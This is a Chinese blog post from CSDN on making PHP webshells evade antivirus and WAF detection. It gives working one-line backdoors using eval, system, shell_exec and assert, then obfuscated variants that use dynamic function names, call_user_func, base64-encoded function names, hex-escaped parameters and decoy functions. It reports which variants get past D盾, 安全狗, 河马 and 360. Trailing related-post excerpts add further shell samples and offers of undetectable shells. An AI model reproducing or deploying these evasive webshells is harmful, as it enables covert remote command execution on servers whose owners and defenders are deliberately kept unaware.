php webshell免杀

最新推荐文章于 2025-05-09 20:22:28 发布
原创 最新推荐文章于 2025-05-09 20:22:28 发布
· 958 阅读 · 16 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #开发语言 #web安全 #安全 #木马 #免杀

终于也是来到了激动人心的时刻——免杀,这集先是简单的一句话木马的免杀

首先是经典的一句话木马:

<?php system($_POST['xxx']); ?>
<?php eval($_POST['xxx']); ?>
<?php echo shell_exec($_POST['xxx']); ?>
<?php assert($_POST['xxx']); ?>

然而这样朴实无华的直接上传肯定是会被杀软拦截,所以就用到了免杀的技巧

本次用来测试的环境有D盾,安全狗,河马webshell在线查杀(SHELLPUB.COM在线查杀

首先用我自己的几个普通的一句话木马进行环境测试

发现直接就能测出来,那么接下来就是免杀的测试

传参

首先简单尝试一下多传几次参

<?php
$a=$_POST['xxx'];
$b=&$a;
$c=&$b:
eval($c);
?>

没想到这么简单就绕过了安全狗

可惜没绕过D盾

这个也是轻松查了出来,看来这样的方法注定不可能长久

当然了我们还有其他小骚招

传参绕过

可以把传入的函数名写在请求中获取,通过将函数名动态地从外部传递。

<?php

$v=$_GET['func'];

$v($_GET['xxx']);

?>

此时可以把func传参为system,把xxx作为命令。

然后把这个方法和回调函数结合

<?php
$f=$_GET['func'];
$v=$_GET['xxx'];
call_user_func($f,$v);
?>

还可以给回调函数上一个base64加密

可惜过了D盾过不了河马

但是大佬的文章中有破局之法,那就是php中的分隔函数explode() 函数

<?php
function DD($Data) {
    return base64_decode($Data);
}
$a = explode("!",$_GET['s']);
DD("Y2FsbF91c2VyX2Z1bmM=")($a[0],$a[1]);
?>

这里只要传参传system!echo hack就能成功RCE

检测结果也是不必说,轻松绕过

二维数组

在免杀时我们可以考虑见要执行的一句话木马程序放到数组中执行达到绕过的目的

<?php
$a=substr_replace("assexx","rt",4);
$b=array($array=array(''=>$a($_POST['p'])));
var_dump($b);
?>

可惜的是并不行,应该是我看的文章时间有点久了,红温了喵

加密

简单的base64加密我就不尝试了,肯定过不了杀软,让我们直接来点够劲的

。。。md测试中传来噩耗,本来搞了个这个

<?php
 eval($_POST["\x78\x78\170"]);

我一看这也测不到,以为成功了,结果是我的windows把我的php文件删了,牛魔的不搞这些有的没的了,直接上混淆

<?php 
function safe_waf(){
    $data1 = "1qazxsw23edcvfr45tgb";
    $data2 = "1qazXSW@3edcVFR$6yhn";
    $data3 = "!QAZxsw2#EDCvfr4%TGB";
    for ($i = 0; $i < 10; $i++) {
        $data1[$i % strlen($data1)];
    }
    $a = 5;
    $b = 10;
    $c = $a + $b;
    $a_safe = array();
    for ($j = 0; $j < 10; $j++) {
        $a_safe[] = md5($j.$data2);
    }
    return $c;
}
 
function Safe(){
    $t = "1qazxsw23edcvfr45tgb";
    $result = strrev($t);
    return $result;
}
 
function DD($Data) {
    return base64_decode($Data);
}
safe_waf();
echo DD("c2hlbGxfZXhlYw==")($_GET['xxx']);
Safe();
?>

PHP webshell 免杀方法_php免杀马-CSDN博客

这是粘贴这个大佬的

这里面加入了Safe和Save_waf两个无用的函数,演的更像一点

可用性就不测了,复制粘贴的包是可用的

这个马本来大佬说是绕不过安恒云沙箱的,但是我拿微步测了一下居然成功绕过了,也是很有生活了

大佬那个文章里还有用AES加密进行绕过的方法,可惜我没怎么学密码,所以就不复现了喵

那么最后来点我感兴趣的,我们的360大人能否查杀到这几个免杀马呢

360大人终究也是陨落了吗(doge)

PHP WebShell
悦分享
08-01 7247
一般的,利用能够执行系统命令、加载代码的函数,或者组合一些普通函数,完成一些高级间谍功能的网站后门的脚本,叫做Webshell。而php做为一门动态语言,其灵活性很高,因此一直以来Webshell的绕过与检测之间不断的产生着化学反应。Webshell绕过的本质其实是针对不同的检测给予不同的绕过方式,因此首先要了解Webshell是如何检测的。...
JSP webshell——webshell
weixin_46601374的博客
06-29 3868
好搞笑,我身边的人省护期间天天提到许少,听说是一个很厉害的大佬。结果我跟着学的视频就是这位大佬的。更离谱的是,聪哥说我们是见过许少的,就是上次给红队整理报告的时候,他就在。果然,实习就是好,传说中的大佬们就在身边——虽然我都不认识,但是还是感觉好厉害。来吧,开始学习首先就是最简单的一句话木马: 太容易被发现了而且在我写代码的时候电脑的病毒和威胁防护就已经开始反应了现在将这一句话木马,分开来写 沙箱是通过了✌但是cmd=ipconfig是什么都不出的,netstat -ano也是。 再次修改代码中间
PHP一句话木马学习
qq_45780190的博客
05-11 3531
PHP一句话木马学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo(); 一句话木马的变形 常用变形函数 convert_uudecode() #解码一个
代码—— 一句话php
01-15
收集于互联网,仅限个人研究使用。
中国蚁剑(AntSword)详解:功能、用途与一句话木马代码剖析
最新发布
2201_75445650的博客
05-09 1597
中国蚁剑(AntSword)是一款开源、跨平台的 WebShell 管理工具,支持 PHP、ASP、ASPX、JSP 等常见脚本语言。它是渗透测试人员和安全研究员常用的 Web 持久化控制平台之一,主要用于管理目标服务器上的 WebShell,实现文件管理、命令执行、数据库操作等功能。开源地址平台支持主要特点1.图形化界面,操作简便2.支持多种语言 WebShell3.插件系统丰富,可拓展、信息收集、内网渗透等功能支持自定义 Shell 编码(UTF-8、GBK 等)
PHP webshell 方法
qq_60256199的博客
07-15 3279
本文介绍phpwebshell简单的方法,总结不一定全面,仅供读者参考。webshell通常可分为一句话木马,小马,大马,内存马。一句话木马是最简单也是最常见的webshell形式,这种木马体积小,隐蔽较强,相对容易;小马是功能较为简单的Webshell,但比一句话木马稍复杂,可能会包含一个简单的文件管理界面或命令执行功能;
php webshell 入门
Goodric的博客
08-09 2152
则是通过灵活运用编程语言的不同特征以及提供的参数重构木马来躲避查工具的查。还有通过加解密技术对木马程序进行加解密处理。
php webshell
river
07-13 2756
转载自:http://blog.csdn.net/settoken/article/details/51581776 中国菜刀下载,基于原版中国菜刀优化版20160309. 下载地址: http://download.csdn.net/detail/settoken/9457567 https://pan.baidu.com/s/1jHoJxHW China chopper https:
php一句话尝试
Blazing-Angel的博客
02-24 680
<?php error_reporting(0); $a = rad2deg^(3).(2); $b = asin^(2).(6); $c = ceil^(1).(1); $exp = $a.$b.$c; //assert $pi=(is_nan^(6).(4)).(tan^(1).(5)); //_GET $pi=$$pi; //$_GET call_user_func($exp,$pi{0}($pi{1})); ?> 利用数学函数进行异或构造,从中寻找可用函数,没找到eval,找到了ass
PHP webshell技术实践与探索.pdf
01-05
PHP Webshell 技术实践与探索 在 Web 攻击阶段,Webshell 是攻击者可以获得的最有利的工具。传统的 Webshell 技术主要基于字符特征、内容特征等来欺骗防火墙策略。但这种方式已经不能够让其在“下一代...
实战之面向PHPWebShell
kali_Ma的博客
10-13 3618
?}}}}?>我们可以通过我们自定义的函数方式,搭配php的版本和可替换函数绕过WAF的拦截,达到的目的!由于在PHP函数中函数名、方法名、类名 不区分大小写,但推荐使用与定义时相同的名字的时候还可以使得大小写进行绕过,所以大大提升了效果!
PHP一句话
10-23
PHP一句话
2016最新phpwebshell安全
03-05
上传压缩文件夹里的php文件不会有任何报毒,过最新版安全狗。2016已测试
php大马
03-03
过目前所有市面的各类防御,仅供参考。切勿用于非法途径。
木马只需要简单一句话php
02-12
木马只需要简单的一句话代码php文件就可以轻松过,可以参考
webshell:webshell生成工具
04-13
webshell生成工具 知识点:使用注释分隔eval函数内关键字,使用类和构造函数替代引用函数 blog: command:python php_webshell.py 知识点:使用分隔关键字等绕过 blog: 知识点:使用自定义加密绕过软拼接...
php一句话木马
qq_58683895的博客
11-21 2533
利用php动态函数的特性,将危险函数拆分成字符,最终使用字符串拼接的方式,然后重新拼接,后加括号执行代码,并且可以使用花指令进行包装,如无限if(1=1)套接,以此来做伪装绕过,达成
php一句话
收集盒 Book box
09-13 1094
by Tm3yShell7 客户端用菜刀,密码cmd,url为test.php?ts7=assert 这个应该算没有什么特征码了,但是缺点就是在web日志中会暴露出来assert 可以都用post: 在菜刀说明用ts7=assertpost
Webshell-PHP
qq_55787787的博客
10-13 2325
万能的PHPwebshell方式。
提升webshell稳定性的开源源码分析
结合【压缩包子文件的文件名称列表】中的信息,文件“源码webshell.php”是这个webshell源码的具体体现。它可能是用PHP编写的,因为PHP是一种广泛用于开发web应用的服务器端脚本语言。文件名直接表明了它的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值